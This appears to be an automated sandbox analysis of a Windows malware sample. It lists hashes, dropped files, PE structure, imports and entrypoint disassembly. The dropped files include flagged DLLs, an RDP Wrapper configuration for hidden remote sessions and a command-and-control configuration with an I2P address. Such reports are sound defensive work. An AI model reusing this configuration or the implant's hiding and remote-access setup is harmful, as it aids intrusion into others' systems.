Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Windows\Temp\t291wOio

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\uUNWplSZ

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Windows\Temp\w3LkirgH

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Windows\Temp\w7pEN9Cm

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Windows\Temp\zMtJJthI

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465603481655458
Encrypted:	false
SSDEEP:	6144:ZIXfpi67eLPU9skLmb0b45WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbh:qXD945WlLZMM6YFHx+h
MD5:	31DBDF481BD3D510E00AF55D51A1DC05
SHA1:	12A01B1293A8A50F036188908564B6F01B1C2CDB
SHA-256:	6C4FCD850C9E1FA9C798D9380416888995BA750F02C87D8C029C5A95256C8BFE
SHA-512:	5C712395807639259296A25A12C46A4D63642D3FEC74865816CA3DBEED1367227D4A8E5C9684FA36BB2ADEDA2E610372428F68ACE3C4A0CF96EBB2DCD55C9F8B
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV..z...................................................................................................................................................................................................................................................................................................................................................N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.026200028456233
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	file.exe
File size:	5'654'528 bytes
MD5:	31d649663149dabd99c51b71e60a4a91
SHA1:	f5f515e1818388c9360bde15a7dfcb265e86a812
SHA256:	2acb9052db5b304a822f8cd1169e31327e967e06ff78064997ea8a5003e783ec
SHA512:	9cd1b7f923f37a620074c2c8dfb79558429e53a6b789ab58917889404dcad505b102a784946dbd9b0bc85ab4eb751af8c33e0c0480bb21619e5d38bef668cc63
SSDEEP:	49152:eDShb1KwGF4Ilow5sADndfK0IptgSoP6MRM2BTXwmlPJmqHc4a/:LQK0/lX9PJhHc
TLSH:	34463A3F72A4C269C15EC17FC1A7CF40E533B9795B33C6E742A106689A168C75EBE620
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	1f6c6cececf16117

Static PE Info

General

Entrypoint:	0x83d530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x67040F91 [Mon Oct 7 16:42:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	bf7e94a88b651f53cc57bdb23fcd2c2f

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFEF838h]
call 00007F3410BE6410h
dec eax
mov eax, dword ptr [0005F064h]
dec eax
mov ecx, dword ptr [eax]
call 00007F3410E99D41h
dec eax
mov eax, dword ptr [0005F055h]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007F3410E9C9F0h
dec eax
mov eax, dword ptr [0005F044h]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFEF0CAh]
dec esp
mov eax, dword ptr [0005F5D3h]
call 00007F3410E99D43h
dec eax
mov eax, dword ptr [0005F027h]
dec eax
mov ecx, dword ptr [eax]
call 00007F3410E99F54h
call 00007F3410BDDE1Fh
jmp 00007F341100C30Ah
nop
nop
call 00007F3410BDE016h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007F3410BDD5ACh
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4ae000	0x97	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4a8000	0x48de	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52a000	0x4b400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4eb000	0x3e9c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b1000	0x39178	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b0000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4a92c0	0x1130	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4ad000	0xe3c	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x43c5c0	0x43c600	4dc050f2b4f53a64168d2d2b3bb04cf6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x43e000	0x5ee38	0x5f000	c96c0455df11a9306f23138f836838b1	False	0.22957699424342104	data	4.71291425546474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x49d000	0xaab4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x4a8000	0x48de	0x4a00	586f243f7059a7c5e3cc1599e712e400	False	0.24266258445945946	data	4.353393974383116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x4ad000	0xe3c	0x1000	cffac5f732be0532b2a4d072e873b001	False	0.2392578125	data	3.075608222202654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x4ae000	0x97	0x200	32e00411291ba873b0de75e561276889	False	0.251953125	data	1.8329856927687613	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x4af000	0x1e4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x4b0000	0x6d	0x200	cb0aedb4d69d2e7d3f915611730f186c	False	0.1953125	data	1.375717479766274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4b1000	0x39178	0x39200	3895bdffdd7a3e7f1d857eb7488e8413	False	0.469976579595186	data	6.475527769134284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0x4eb000	0x3e9c4	0x3ea00	6086c296052ff020a33a7ba75c81e109	False	0.491813248502994	data	6.369980557431763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52a000	0x4b400	0x4b400	7cd7c843107b0c985a216d5520dc5729	False	0.5633175872093024	data	6.403199046558459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x52aca8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x52addc	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x52af10	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x52b044	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x52b178	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x52b2ac	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x52b3e0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x52b514	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688			0.4147121535181237
RT_ICON	0x52c3bc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152			0.476985559566787
RT_ICON	0x52cc64	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.48554913294797686
RT_ICON	0x52d1cc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.5167012448132781
RT_ICON	0x52f774	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.5719981238273921
RT_ICON	0x53081c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.7109929078014184
RT_STRING	0x530c84	0x8b0	data			0.2648381294964029
RT_STRING	0x531534	0x2e4	data			0.4540540540540541
RT_STRING	0x531818	0x2a4	data			0.4896449704142012
RT_STRING	0x531abc	0x200	data			0.53125
RT_STRING	0x531cbc	0x1f0	data			0.5
RT_STRING	0x531eac	0x378	data			0.43243243243243246
RT_STRING	0x532224	0x390	data			0.39144736842105265
RT_STRING	0x5325b4	0x2f0	data			0.4242021276595745
RT_STRING	0x5328a4	0x488	data			0.3905172413793103
RT_STRING	0x532d2c	0x4e4	data			0.39217252396166136
RT_STRING	0x533210	0x3a4	data			0.4034334763948498
RT_STRING	0x5335b4	0x34c	data			0.40165876777251186
RT_STRING	0x533900	0x390	data			0.3355263157894737
RT_STRING	0x533c90	0x3e0	data			0.43850806451612906
RT_STRING	0x534070	0x38c	data			0.31167400881057267
RT_STRING	0x5343fc	0x3e0	data			0.42439516129032256
RT_STRING	0x5347dc	0x184	data			0.5412371134020618
RT_STRING	0x534960	0xd4	data			0.660377358490566
RT_STRING	0x534a34	0x214	data			0.5
RT_STRING	0x534c48	0x3c8	data			0.3822314049586777
RT_STRING	0x535010	0x3f4	data			0.391304347826087
RT_STRING	0x535404	0x47c	data			0.3423344947735192
RT_STRING	0x535880	0x28c	data			0.34662576687116564
RT_STRING	0x535b0c	0x454	data			0.41064981949458484
RT_STRING	0x535f60	0x4b4	data			0.3953488372093023
RT_STRING	0x536414	0x4cc	data			0.34446254071661236
RT_STRING	0x5368e0	0x3b0	data			0.3792372881355932
RT_STRING	0x536c90	0x3d8	data			0.34146341463414637
RT_STRING	0x537068	0x35c	data			0.37906976744186044
RT_STRING	0x5373c4	0xd0	data			0.5721153846153846
RT_STRING	0x537494	0xa0	data			0.65
RT_STRING	0x537534	0x394	data			0.4268558951965066
RT_STRING	0x5378c8	0x434	data			0.3308550185873606
RT_STRING	0x537cfc	0x390	data			0.37609649122807015
RT_STRING	0x53808c	0x2dc	data			0.38114754098360654
RT_STRING	0x538368	0x34c	data			0.3246445497630332
RT_RCDATA	0x5386b4	0x10	data			1.5
RT_RCDATA	0x5386c4	0x3bbb7	data	English	United States	0.6175269656629732
RT_RCDATA	0x57427c	0xb78	data			0.4778610354223433
RT_RCDATA	0x574df4	0x151	Delphi compiled form 'TForm1'			0.7210682492581603
RT_GROUP_CURSOR	0x574f48	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x574f5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x574f70	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574f84	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574f98	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574fac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x574fc0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x574fd4	0x5a	data			0.7
RT_VERSION	0x575030	0x368	data	English	United States	0.44954128440366975

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll	SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
